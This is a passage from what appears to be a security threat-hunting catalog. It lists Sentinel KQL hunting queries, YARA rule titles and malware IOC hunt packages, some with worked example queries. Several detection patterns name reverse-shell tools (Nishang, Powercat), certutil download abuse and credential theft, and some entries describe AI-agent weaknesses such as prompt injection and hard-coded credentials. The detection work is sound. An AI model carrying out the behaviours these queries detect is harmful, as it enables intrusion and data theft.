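let minRequests = 200;   // flag sessions with at least this many read/list calls
let minNotFound = 50;    // or this many 404s (guessing blob names that do not exist)
StorageBlobLogs
| where TimeGenerated > ago(1d)
| where OperationName in ("ListBlobs", "GetBlob", "GetBlobProperties")
| sort by CallerIpAddress asc, TimeGenerated asc        // serialise for the window function
| extend SessionStart = row_window_session(TimeGenerated, maxSession, maxGap,
                                            CallerIpAddress != prev(CallerIpAddress))
| summarize Requests = count(),
            DistinctBlobs = dcount(Uri),
            NotFound = countif(StatusCode == 404),
            Lists = countif(OperationName == "ListBlobs"),
            Anonymous = countif(AuthenticationType == "Anonymous"),
            SessionEnd = max(TimeGenerated),
            Accounts = make_set(AccountName)
    by CallerIpAddress, SessionStart
| where Requests >= minRequests or NotFound >= minNotFound
| extend NotFoundRatio = round(1.0 * NotFound / Requests, 2)
| order by NotFound desc, Requests desc
```

The fourth argument restarts the session whenever the caller IP changes, which is why the sort must put IP first. A high NotFoundRatio with few ListBlobs calls is the spraying signature (the caller cannot list, so it guesses); a low ratio with many DistinctBlobs and an Anonymous count above zero is a public container being crawled.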
Look for ElfHash
yara low
Yara-Rules source

Look for ElfHash

community
Yara-Rules source

Look for FlyUtils.CnDES Decrypt ECB function

community
Yara-Rules source

Look for FlyUtils.CnDES Encrypt ECB function

community
Azure-Sentinel source
T1136

'This hunting query identifies a user who adds/invites a member to the organization for the first time. This technique can be leveraged by attackers to add stealthy account access to the organization.'

huntingmicrosoftofficial
Azure-Sentinel source
T1078.004
AuditLogs

'This query will look for events where a guest user was invited but has not accepted/redeemed the invite for an unusually long period. Any invites not redeemed for a long period of time can be misused and

huntingmicrosoftofficial
Azure-Sentinel source
T1547.006
DeviceProcessEvents

'Detects observed Visual Studio Code (VS Code) extension installation activity on a user's system within the query time range. Note: This query does not return a complete per-user inventory of instal

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
T1484
CloudAppEvents

"This query searches for any action type with high frequency that involves adding, modifying, or removing something in cloud app policies. It sees where the properties are modified such that the old v

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
T1190
AzureDiagnostics

'This hunting query looks in Azure Web Application Firewall data to find possible SpringShell Exploitation Attempt (CVE-2022-22965). The Spring Framework is one of the most widely used lightweight op

backdoorexploithuntingmicrosoftofficial
Yara-Rules source

List of primes [char]

community
Yara-Rules source

List of primes [long]

community
Azure-Sentinel source
T1136
AuditLogs

'Compares the current day to last 14 days of audits to identify new audit activities. Useful for tracking malicious activity related to user/group additions/removals by Azure Apps and automated approv

huntingmicrosoftofficial
Azure-Sentinel source
T1136
AuditLogs

'Compares current day to last 14 days of audits to identify new audit activities. Useful for tracking malicious activity related to user/group additions/removals by specific users.'

huntingmicrosoftofficial
Azure-Sentinel source
T1570
DeviceFileEvents

'Finds instances where a file is uploaded to blob or file storage and is then seen on an endpoint by Microsoft Defender XDR.'

huntingmicrosoftofficial
ThreatFox: Kimwolf IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 5 IOCs associated with Kimwolf

apk-kimwolfiocthreatfox
ThreatFox source
DnsEvents

Hunt package for 112 IOCs associated with ClearFake

iocjs-clearfakethreatfox
ThreatFox: KongTuke IOCs
ioc-hunt high
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 2 IOCs associated with KongTuke

iocjs-kongtukethreatfox
ThreatFox source
DnsEvents

Hunt package for 3 IOCs associated with OtterCookie

iocjs-otter_cookiethreatfox
ThreatFox source
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsDnsEventsUrlClickEvents

Hunt package for 44 IOCs associated with Unknown malware

iocthreatfoxunknown
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 3 IOCs associated with Cobalt Strike

cobalt-strikeiocthreatfoxwin-cobalt_strike
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 2 IOCs associated with Nanocore RAT

backdooriocthreatfoxwin-nanocore
ThreatFox: Remcos IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 2 IOCs associated with Remcos

iocthreatfoxwin-remcos
ThreatFox source
CommonSecurityLogDeviceNetworkEventsUrlClickEvents

SmartLoader is a multi-stage loader malware that establishes persistence and exfiltrates data by dropping additional payloads and maintaining command-and-control communication

iocthreatfoxwin-smartloader
ThreatFox source
DnsEvents

StrelaStealer is a credential-stealing malware that exfiltrates

infostealeriocthreatfoxwin-strelastealer
ThreatFox: Vidar IOCs
ioc-hunt high
ThreatFox source
DnsEventsUrlClickEvents

Vidar is a data exfiltration malware that steals credentials and sensitive information, often using encrypted channels to transmit stolen data to command-and-control servers.

iocthreatfoxwin-vidar
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 37 malicious URLs tagged as 32-bit

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 24 malicious URLs tagged as ClearFake

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 24 malicious URLs tagged as malware_download

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 14 malicious URLs tagged as Mozi

iocurlhaus
Azure-Sentinel source
T1528
SigninLogs

'This hunting query will try to identify the user account used to perform a file upload to blob storage. This query can be used to match all file upload events, or filtering can be applied on filename

huntingmicrosoftofficial
Azure-Sentinel source
T1098, T1078, T1496
AuditLogs

'Identifies when a new user is granted access and any subsequent audit related activity. This can help you identify rogue or malicious user behavior.'

huntingmicrosoftofficial
Azure-Sentinel source
T1078
SigninLogs

'Detects when a user has successfully authenticated to another Microsoft Entra ID tenant with an identity in your organization's tenant. Ref: https://docs.microsoft.com/azure/active-directory/fundam

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
T1098, T1548
AuditLogs

'Identifies accounts that have been added to a PIM managed privileged group'

huntingmicrosoftofficial
Azure-Sentinel source
T1556.006
AuditLogs

'Identifies modifications to a user's MFA settings. An attacker could use access to modify MFA settings to bypass MFA requirements or maintain persistence.'

evasionhuntingmicrosoftofficialpersistence
Azure-Sentinel source
T1556
AuditLogs

This query shows details about all approved Entra ID Governance Access Package assignments. The results include the time the request was created and approved along with the justification text provide

huntingmicrosoftofficial
Azure-Sentinel source
T1555
AuditLogsSecurityAlert

'Looks for users retrieving BitLocker keys. Enriches these logs with a summary of alerts associated with the user accessing the keys. Use this query to start looking for anomalous patterns of key retr

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
T1070
imRegistry

'This detection looks for the prevention of crash dumps being created. Malware can use this to limit reporting; look for suspicious processes setting this registry key.'

huntingmicrosoftofficial
Yara-Rules source

Steal IE 7 credential

communitycredential-theft
Azure-Sentinel source
imProcessCreate

'breakdown of scripts running in the environment'

huntingmicrosoftofficial
Azure-Sentinel source
imProcessCreate

'Entropy calculation used to help identify Hosts where they have a high variety of processes (a high entropy process list on a given Host over time). This helps us identify rare processes on a given Ho

huntingmicrosoftofficial
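The entropy entry above scores each host by how evenly its process launches are spread. The KQL below is an added example that computes Shannon entropy per host over the ASIM imProcessCreate parser, not the catalog's query; it assumes the parser's DvcHostname and TargetProcessName fields.

```kql
// Added example: Shannon entropy (bits) of the per-host process launch distribution.
// p = launches of one process / all launches on that host; H = -sum(p * log2 p).
let lookback = 7d;
let perProc = imProcessCreate
| where TimeGenerated > ago(lookback)
| summarize Launches = count() by DvcHostname, TargetProcessName;
let perHost = perProc
| summarize HostTotal = sum(Launches), DistinctProcs = count() by DvcHostname;
perProc
| join kind=inner perHost on DvcHostname
| extend p = 1.0 * Launches / HostTotal
| summarize PartialEntropy = sum(p * log2(p)) by DvcHostname, HostTotal, DistinctProcs
| where DistinctProcs > 1                      // log2(1) = 0 would divide by zero below
| extend ProcessEntropyBits = -PartialEntropy
// log2(DistinctProcs) is the maximum possible for that many processes; the ratio
// makes a 20-process kiosk comparable with a 2,000-process build server
| extend NormalisedEntropy = round(ProcessEntropyBits / log2(DistinctProcs), 3)
| project DvcHostname, HostTotal, DistinctProcs,
          ProcessEntropyBits = round(ProcessEntropyBits, 3), NormalisedEntropy
| order by ProcessEntropyBits desc
```

Raw entropy ranks hosts that simply run many different things; the normalised value is the one that moves when a host with a normally flat profile starts launching a handful of new binaries. Join the result back to perProc and sort by Launches ascending to list the rare processes on the hosts that scored highest.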
Azure-Sentinel source
imProcessCreate

'Finds attempts to list users or groups using the built-in Windows 'net' tool '

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
T1114
imProcessCreate

'This hunting query looks for hosts exporting a mailbox from an on-prem Exchange server, followed by that same host removing the export within a short time window. This pattern has been observed by at

backdoorhuntingmicrosoftofficial
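The mailbox-export entry above pairs an export on a host with its removal on the same host shortly after. The KQL below is an added example of that pairing over ASIM imProcessCreate, not the catalog's query. It assumes the parser's DvcHostname, ActorUsername and TargetProcessCommandLine fields, and that the New-MailboxExportRequest / Remove-MailboxExportRequest cmdlets appear in the process command line (they will not if typed interactively inside an already-running Exchange Management Shell); the 2-hour window is an arbitrary starting value.

```kql
// Added example: New-MailboxExportRequest followed on the same host by
// Remove-MailboxExportRequest within 'window'.
let lookback = 7d;
let window = 2h;
let exports = imProcessCreate
| where TimeGenerated > ago(lookback)
| where TargetProcessCommandLine has "New-MailboxExportRequest"
// -FilePath is the UNC destination of the exported PST
| extend ExportPath = extract(@"(?i)-FilePath\s+[""']?([^""'\s]+)", 1, TargetProcessCommandLine)
| project ExportTime = TimeGenerated, DvcHostname, ActorUsername,
          ExportPath, ExportCmd = TargetProcessCommandLine;
let removals = imProcessCreate
| where TimeGenerated > ago(lookback)
| where TargetProcessCommandLine has "Remove-MailboxExportRequest"
| project RemoveTime = TimeGenerated, DvcHostname,
          RemoveUser = ActorUsername, RemoveCmd = TargetProcessCommandLine;
exports
| join kind=inner removals on DvcHostname
| where RemoveTime between (ExportTime .. (ExportTime + window))
| extend Delta = RemoveTime - ExportTime
| project ExportTime, RemoveTime, Delta, DvcHostname, ActorUsername, RemoveUser,
          ExportPath, ExportCmd, RemoveCmd
| order by ExportTime desc
```

Removing the export request only deletes the request object, not the PST, so ExportPath is the artefact to go and collect. A destination under the web root of the Exchange server, or one that was later read by w3wp.exe, is the variant seen in webshell-assisted mailbox theft.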
Azure-Sentinel source
T1011
imProcessCreate

'Invoke-PowerShellTcpOneLine is a PowerShell script to create a simple and small reverse shell. It can be abused by attackers to exfiltrate data. This query looks for command line activity similar to

backdoorhuntingmicrosoftofficialpowershell
ldpreload
yara low
Yara-Rules source

YARA rule: ldpreload

community
Yara-Rules source

APC queue tasks migration

backdoorcommunity
Yara-Rules source

This rule checks MySQL database presence

community
Azure-Sentinel source
T1011
imProcessCreate

'Looks for Base64-encoded commands associated with the Nishang reverse TCP shell. Ref: https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1'

backdoorhuntingmicrosoftofficialpowershell
Azure-Sentinel source
T1098
AuditLogs

'This hunting query identifies updates to the RequiredResourceAccess property of an OAuth application. This property specifies resources that an application requires access to and the set of OAuth per

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
T1011
imProcessCreate

'Powercat is a PowerShell implementation of netcat. Whilst it can be used as a legitimate administrative tool it can be abused by attackers to exfiltrate data. This query looks for command line activi

backdoorhuntingmicrosoftofficialpowershell
Azure-Sentinel source
imProcessCreate

'Finds PowerShell execution events that could involve a download'

huntingmicrosoftofficialpowershell
Yara-Rules source

The 'rat_rdp

backdoorcommunity
Yara-Rules source

The 'rat_telnet' YARA rule detects the presence of a Remote Administration

backdoorcommunity
Yara-Rules source

Remote Administration toolkit VNC

backdoorcommunity
Yara-Rules source

Remote Administration toolkit using webcam

backdoorcommunity
Azure-Sentinel source
T1218.011
imProcessCreate

'This detection uses Normalized Process Events to hunt Signed Binary Proxy Execution: Rundll32 activities'

huntingmicrosoftofficial
Yara-Rules source

Sniff LAN network traffic

community
Azure-Sentinel source
T1072
imProcessCreate

'Beyond your internal software management systems, it is possible you may not have visibility into your entire footprint of SolarWinds installations. This is intended to help use process execution inf

huntingmicrosoftofficial
Yara-Rules source

Malware can spread east-west file

community
Yara-Rules source

Malware can spread east-west using share drive

community
Yara-Rules source

Match Windows Http API call

community
Yara-Rules source

Match Windows Inet API call

community
Yara-Rules source

Match Windows Inet API library declaration

backdoorcommunity
Yara-Rules source

Match Winsock 2 API library declaration

backdoorcommunity
Azure-Sentinel source
T1110
imProcessCreate

'Summarizes uses of uncommon & undocumented command-line switches to create persistence. User accounts may be created to achieve persistence on a machine. Read more here: https://attack.mitre.org/wiki/T

huntingmicrosoftofficialpersistence
Azure-Sentinel source
T1059, T1087, T1482, T1201, T1069, T1074
imProcessCreate

Attackers can use AdFind, an administrative tool, to gather information about domain controllers and ADFS servers. They may also rename the executable to look like other benign tools on the system. Below query

backdoorhuntingmicrosoftofficialransomware
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 113 IOCs associated with ClearFake

iocjs-clearfakethreatfox
ThreatFox: KongTuke IOCs
ioc-hunt high
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 4 IOCs associated with KongTuke

iocjs-kongtukethreatfox
ThreatFox source
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsDnsEventsUrlClickEvents

Hunt package for 43 IOCs associated with Unknown malware

iocthreatfoxunknown
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Cobalt Strike is a sophisticated malware used for command and control (C2) operations, enabling attackers

cobalt-strikeiocthreatfoxwin-cobalt_strike
ThreatFox source
UrlClickEvents

The Lumma Stealer malware is a data-exfiltration tool that steals sensitive information such as credentials, browser data, and cryptocurrency wallet details. It typically arrives via phishing emails containing malicious URLs or compromised websites that deliver the payload. SOC analysts should monitor for unusual outbound traffic, unexpected process executions, and signs of credential theft or

infostealeriocthreatfoxwin-lumma
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 2 IOCs associated with MaskGramStealer

infostealeriocthreatfoxwin-maskgramstealer
ThreatFox source
DnsEvents

StrelaStealer is a credential-stealing malware that exfiltrates sensitive data such as usernames, passwords, and browser cookies by establishing command-and-control (C2) communication through malicious domains. It

infostealeriocthreatfoxwin-strelastealer
ThreatFox: Vidar IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsUrlClickEvents

Vidar malware is a data exfiltration tool that steals credentials and sensitive information via encrypted channels, often leveraging stolen credentials or phishing to maintain persistence. It typically arrives through malicious email attachments, compromised credentials, or exploit kits, using IP:port and URL IOCs to establish command-and

iocthreatfoxwin-vidar
Azure-Sentinel source
imProcessCreate

'Shows the rarest processes seen running for the first time. (Performs best over longer time ranges - eg 3+ days rather than 24 hours!) These new processes could be benign new programs installed on ho

backdoorhuntingmicrosoftofficial
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 3 malicious URLs tagged as 118-107-44-190-8080

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 3 malicious URLs tagged as 118-107-44-213-8080

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 3 malicious URLs tagged as 118-107-44-253-8080

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 15 malicious URLs tagged as 144-91-86-92

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 6 malicious URLs tagged as 32-bit

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 5 malicious URLs tagged as 38-76-199-154-8888

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 2 malicious URLs tagged as ascii

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 7 malicious URLs tagged as ClearFake

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 29 malicious URLs tagged as malware_download

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 11 malicious URLs tagged as mirai

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 13 malicious URLs tagged as Mozi

iocurlhaus
Yara-Rules source

Affect private profile

community
Yara-Rules source

Create or check mutex

community
Yara-Rules source

Affect private profile

community
Yara-Rules source

Affect system registries

community
Yara-Rules source

Affect system token

community
Azure-Sentinel source
T1529
imProcessCreate

'This detection uses Normalized Process Events to detect System Shutdown/Reboot (MITRE Technique: T1529)'

huntingmicrosoftofficial
Azure-Sentinel source
T1059

This query identifies Copilot Studio AI agents that have Model Context Protocol (MCP) tools configured. MCP tools extend agent capabilities but introduce additional security considerations because the

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
T1078, T1562
IdentityInfo

This query identifies AI agents whose owners are either disabled or removed from the organization. Orphaned agents without an active owner pose governance and security risks because no one is account

backdoorhuntingmicrosoftofficialpersistence
Azure-Sentinel source

This query identifies AI agents that remain unpublished and have not been modified for at least 30 days. While these agents may not pose an immediate security threat, they can create operational inef

backdoorhuntingmicrosoftofficial
Yara-Rules source

Perform crypto currency mining

community
Yara-Rules source

Inject certificate in store

community
Azure-Sentinel source
T1105
imProcessCreate

'This detection uses Normalized Process Events to hunt Certutil activities'

huntingmicrosoftofficial
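The certutil entry above hunts the tool's abuse as a downloader and Base64 codec. The KQL below is an added example of that hunt over ASIM imProcessCreate, not the catalog's query; it assumes the parser's TargetProcessName, TargetProcessCommandLine, ActingProcessName and DvcHostname fields.

```kql
// Added example: certutil.exe used to fetch a remote file (-urlcache / -verifyctl)
// or to decode/encode a payload, with the parent process for context.
let lookback = 7d;
imProcessCreate
| where TimeGenerated > ago(lookback)
| where TargetProcessName endswith @"\certutil.exe" or TargetProcessName =~ "certutil.exe"
| extend Cmd = tolower(TargetProcessCommandLine)
| extend Download = (Cmd contains "urlcache" or Cmd contains "verifyctl") and Cmd contains "http"
| extend Decode   = Cmd contains "-decode" or Cmd contains "/decode"      // also matches -decodehex
| extend Encode   = Cmd contains "-encode" or Cmd contains "/encode"
| where Download or Decode or Encode
| extend Reason = case(Download, "download", Decode, "decode", "encode")
| extend RemoteUrl = extract(@"(https?://[^\s""']+)", 1, Cmd)
| project TimeGenerated, DvcHostname, ActorUsername, Reason, RemoteUrl,
          ActingProcessName, TargetProcessCommandLine
| order by TimeGenerated desc
```

Legitimate certificate management almost never combines certutil with a URL or with -decode, so the volume is low enough to review every hit; the parent process is the fast triage key (an Office application, script host or web server worker process as ActingProcessName is rarely benign).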
Azure-Sentinel source
CloudAppEvents

This query identifies Copilot Studio AI agents that are published and contain actions configured with Author Authentication (maker's personal credentials) but have not been used or invoked in the last

credential-theftexploithuntingmicrosoftofficial
Azure-Sentinel source
T1552, T1078

This query identifies Copilot Studio AI agents that contain hard-coded credentials in Topics or Actions. Storing credentials in clear text within agent logic creates a security risk because these sec

credential-thefthuntingmicrosoftofficial
Azure-Sentinel source
T1562

This query identifies Copilot Studio AI agents that use HTTP actions to endpoints where Power Platform connectors are available (e.g., graph.microsoft.com, management.azure.com). Using direct HTTP ca

backdoorevasionhuntingmicrosoftofficial
Azure-Sentinel source
T1071, T1040

This query identifies Copilot Studio AI agents that send HTTP requests to endpoints using non-HTTPS schemes. Communication over unencrypted HTTP exposes sensitive data in transit and increases the ri

aptcredential-theftexploithuntingmicrosoftofficial
Azure-Sentinel source
T1071, T1041

This query identifies Copilot Studio AI agents that send HTTP requests to endpoints using non-standard ports (other than 443). Communication over uncommon ports can indicate suspicious activity, unau

backdoorevasionexploithuntingmicrosoftofficial
Azure-Sentinel source
T1078, T1552

Identifies Copilot Studio AI agents with Model Context Protocol (MCP) tools configured using maker credentials. This configuration can create security risks because the tool runs with the maker's pers

backdoorcredential-thefthuntingmicrosoftofficial
Azure-Sentinel source
T1078, T1190

This query identifies Copilot Studio AI agents without authentication mechanisms. Authentication is an agent-level configuration. Such misconfiguration poses significant security risks because when t

backdoorhuntingmicrosoftofficial
Azure-Sentinel source

This query identifies Copilot Studio AI agents that are shared broadly-either with the entire organization or configured for multi-tenant access. Such configurations significantly increase the risk of

backdoorhuntingmicrosoftofficial
Azure-Sentinel source

This query identifies Copilot Studio AI agents that are published and use the maker's personal credentials in their authentication or integration flows. This configuration introduces security risks b

backdoorcredential-thefthuntingmicrosoftofficial
Azure-Sentinel source
CloudAppEvents

This query identifies Copilot Studio AI agents that are published but have not been used by any user in the organization for the last 30 days. Dormant agents can create unnecessary exposure and may s

backdoorcredential-thefthuntingmicrosoftofficial
Azure-Sentinel source
T1499, T1562

Advers

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
T1041
IdentityInfo

This query identifies Copilot Studio AI agents configured to send emails to external mailboxes (outside the organization's domains). Such configurations can lead to sensitive or internal data being e

backdoorexploithuntingmicrosoftofficial
Azure-Sentinel source

This query identifies Copilot Studio AI agents with classic orchestration that include Actions not referenced in any Topic. While unused Actions may not pose an immediate security risk, they can intr

backdoorcredential-thefthuntingmicrosoftofficial
Yara-Rules source

Steal Firefox credential

communitycredential-theft
Steal credential
yara low
Yara-Rules source

Steal credential

communitycredential-theft
Yara-Rules source

Steal VNC credential

communitycredential-theft
Azure-Sentinel source
T1071
SecurityAlert

'This hunting query looks for process command line activity related to activity observed by Dev-0056. The command lines this query hunts for are used as part of the threat actor's post exploitation ac

exploithuntingmicrosoftofficial
Azure-Sentinel source
T1204, T1102, T1567

'This hunting query looks for hosts that have attempted to interact with the Discord CDN. This activity is not normally invoked from the command line and could indicate C2, exfiltration, or malware de

backdoorhuntingmicrosoftofficial
Dynamic DNS
yara low
Yara-Rules source

Dynamic DNS

community
Yara-Rules source

Escalate privileges

community
Azure-Sentinel source
T1119
imProcessCreate

'The Exchange PowerShell Snap-in was loaded on a host; this allows for Exchange server management via PowerShell. Whilst this is a legitimate administrative tool, it is abused by attackers to perform

backdoorhuntingmicrosoftofficialpowershell
Run a keylogger
yara low
Yara-Rules source

Run a keylogger

communityinfostealer
Yara-Rules source

Lookup Geolocation

community
Yara-Rules source

Lookup external IP

community
Yara-Rules source

Communication using a DGA

community
Yara-Rules source

Communications use DNS

community
Yara-Rules source

File downloader/dropper

community
Yara-Rules source

Communications over FTP

community
Yara-Rules source

Communications over HTTP

community
Yara-Rules source

Communications over IRC network

community
Yara-Rules source

Communications over SSL

community
Yara-Rules source

Communications over RAW socket

community
Take screenshot
yara low
Yara-Rules source

Take screenshot

community
Record Audio
yara low
Yara-Rules source

Record Audio

community
ThreatFox: Kimwolf IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 6 IOCs associated with Kimwolf

apk-kimwolfiocthreatfox
ThreatFox source
DnsEvents

Hunt package for 107 IOCs associated with ClearFake

iocjs-clearfakethreatfox
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 6 IOCs associated with Unknown malware

iocthreatfoxunknown
ThreatFox source
DnsEvents

Hunt package for 4 IOCs associated with Unknown Stealer

infostealeriocthreatfoxunknown_stealer
ThreatFox: Remcos IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with Remcos

iocthreatfoxwin-remcos
ThreatFox source
DnsEvents

Hunt package for 66 IOCs associated with StrelaStealer

infostealeriocthreatfoxwin-strelastealer
ThreatFox: Vidar IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents

Hunt package for 6 IOCs associated with Vidar

iocthreatfoxwin-vidar
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 21 malicious URLs tagged as 32-bit

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 30 malicious URLs tagged as ClearFake

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 18 malicious URLs tagged as elf

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 10 malicious URLs tagged as exe

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 12 malicious URLs tagged as malware_download

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Mozi is a peer-to-peer IoT botnet that spreads by brute-forcing weak Telnet credentials and exploiting known router vulnerabilities, then pulls its payload from the listed URLs; its DHT-based P2P network gives it persistent command-and-control without a fixed server. SOC analysts should monitor for outbound traffic to the listed domains, signs of lateral movement,

iocurlhaus
Azure-Sentinel source
T1552, T1078
IdentityInfo

This query identifies A365 AI agents that contain hard-coded credentials in their tools or actions. Storing credentials in clear text within agent logic creates a security risk because these secrets

credential-thefthuntingmicrosoftofficial
Azure-Sentinel source
T1071, T1040
IdentityInfo

This query identifies A365 AI agents that send HTTP requests to endpoints using non-HTTPS schemes. Communication over unencrypted HTTP exposes sensitive data in transit and increases the risk of inte

aptcredential-theftexploithuntingmicrosoftofficial
Azure-Sentinel source
T1071, T1041
IdentityInfo

This query identifies A365 AI agents that send HTTP requests to endpoints using non-standard ports (other than 443). Communication over uncommon ports can indicate suspicious activity, unauthorized n

backdoorevasionexploithuntingmicrosoftofficial
Azure-Sentinel source
T1059
IdentityInfo

This query identifies A365 AI agents that have Model Context Protocol (MCP) tools configured. MCP tools extend agent capabilities but introduce additional security considerations because they can exec

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
T1499, T1562
IdentityInfo

This query identifies A365 AI agents that have tools configured that are not mentioned in their instructions. Tools the instructions never reference can still be invoked by the orchestrator, so they widen the agent's effective capability beyond what its maker described and reviewed.

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
T1078, T1562
IdentityInfo

This query identifies A365 AI agents whose owners are either disabled or removed from the organization, and are not blocked. Orphaned agents without an active owner pose governance and security risks

backdoorhuntingmicrosoftofficialpersistence
Azure-Sentinel source
IdentityInfo

This query identifies A365 AI agents that are shared publicly. Such configurations significantly increase the risk of unauthorized access by unintended users, which could lead to data exposure or misu

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
T1499, T1562
IdentityInfo

This query identifies A365 AI agents that are published but have short or insufficient instructions. Short instructions increase the risk of prompt injection attacks, where malicious input can influe

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
T1499, T1562
IdentityInfo

This query identifies A365 AI agents that are published but lack configured instructions. Missing instructions increase the risk of prompt injection attacks, where malicious input can influence the a

backdoorhuntingmicrosoftofficial
Yara-Rules source

Check if hotfix are applied

community
Azure-Sentinel source
T1041, T1565

This query identifies Copilot Studio AI agents using generative orchestration to send emails via the Outlook connector where all action input values are populated dynamically by the orchestrator. Th

backdoorhuntingmicrosoftofficial
Yara-Rules source

Create a COM server

community
Yara-Rules source

Create a new process

community
Yara-Rules source

Create a windows service

community
Bypass DEP
yara low
Yara-Rules source

Bypass DEP

communityevasion
Yara-Rules source

Disable Task Manager

community
Azure-Sentinel source
T1190

'This query looks for messages related to file downloads of suspicious file types on an Exchange Server. This could indicate attempted deployment of webshells. This query uses the Exchange HttpProxy

backdoormicrosoftofficialwebshell
Azure-Sentinel source
T1190
W3CIISLog

'This query looks for suspicious request patterns to Exchange servers that fit patterns recently blogged about by PeterJson. This exploitation chain utilises an SSRF vulnerability in Exchange which ev

exploitmicrosoftofficialpowershell
Azure-Sentinel source
T1098, T1556

'This alerts when the account setting is changed to allow either external domain access or anonymous access to meetings.'

microsoftofficial
Azure-Sentinel source
T1190
W3CIISLog

'Identifies when 30 or more ports are used for a given client IP in 10 minutes occurring on the IIS server. This could be indicative of attempted port scanning or exploit attempt at internet facing we

exploitmicrosoftofficial
Azure-Sentinel source
T1110
W3CIISLog

'Identifies when 100 or more failed attempts by a given user in 10 minutes occur on the IIS Server. This could be indicative of attempted brute force based on known account information. This could als

microsoftofficial
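The two IIS entries above (30+ ports per client IP, 100+ failed attempts per user, both in 10 minutes) are threshold-in-window hunts over W3CIISLog. The KQL below is an added example of the brute-force variant, not the catalog's query; it assumes W3CIISLog's standard columns (cIP, csUserName, scStatus as a string, csUriStem, sSiteName, sPort) and treats 401/403 responses as failed attempts.

```kql
// Added example: 100 or more failed authentications for one user in any 10-minute bin,
// with the source IPs and paths involved.
let window = 10m;
let threshold = 100;
W3CIISLog
| where TimeGenerated > ago(1d)
| where isnotempty(csUserName)
| where scStatus in ("401", "403")
| summarize FailedAttempts = count(),
            SourceIPs = make_set(cIP, 20),
            DistinctIPs = dcount(cIP),
            Paths = make_set(csUriStem, 10),
            FirstFail = min(TimeGenerated), LastFail = max(TimeGenerated)
    by csUserName, sSiteName, WindowStart = bin(TimeGenerated, window)
| where FailedAttempts >= threshold
| extend Distributed = DistinctIPs > 1       // one account hammered from many sources
| order by FailedAttempts desc
```

The port-scan variant is the same query with the grouping swapped: drop the status filter, summarize dcount(sPort) by cIP and the 10-minute bin, and keep rows at or above 30. In both cases a bin() boundary can split one burst across two bins, so treat the threshold as a floor and review the adjacent bin when a result sits just below it.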
Yara-Rules source

Hijack network configuration

backdoorcommunity
Yara-Rules source

Code injection with CreateRemoteThread in a remote process

community
Yara-Rules source

Communications over a DynDNS network

community
Yara-Rules source

Communications over P2P network

community
Yara-Rules source

Communications over SMTP

community
Yara-Rules source

Communications over SMTP

community
Yara-Rules source

Communications over SMTP

community
Yara-Rules source

Listen for incoming communication

community
Yara-Rules source

Communications over TOR network

community
Yara-Rules source

Communications over Teredo network

community
Yara-Rules source

Communications over UDP network

community
Yara-Rules source

Install itself for autorun at Windows startup

communitypersistence
Azure-Sentinel source
T1190
W3CIISLog

'This query looks for suspicious request patterns to Exchange servers that fit a pattern observed by Silk Typhoon actors. The same query can be run on HTTPProxy logs from on-premises hosted Exchange se

microsoftofficial
Azure-Sentinel source
T1190

'This query looks for messages related to file downloads of suspicious file types. This query uses the Exchange HttpProxy AOBGeneratorLog, you will need to onboard this log as a custom log under the t

backdoormicrosoftofficial
Azure-Sentinel source
T1598

'Alerts on links that have been shared across multiple Zoom chat channels by the same user in a short space of time. Adjust the threshold figure to change the number of channels a message needs to be

microsoftofficial
ThreatFox source
DnsEvents

Hunt package for 124 IOCs associated with ClearFake

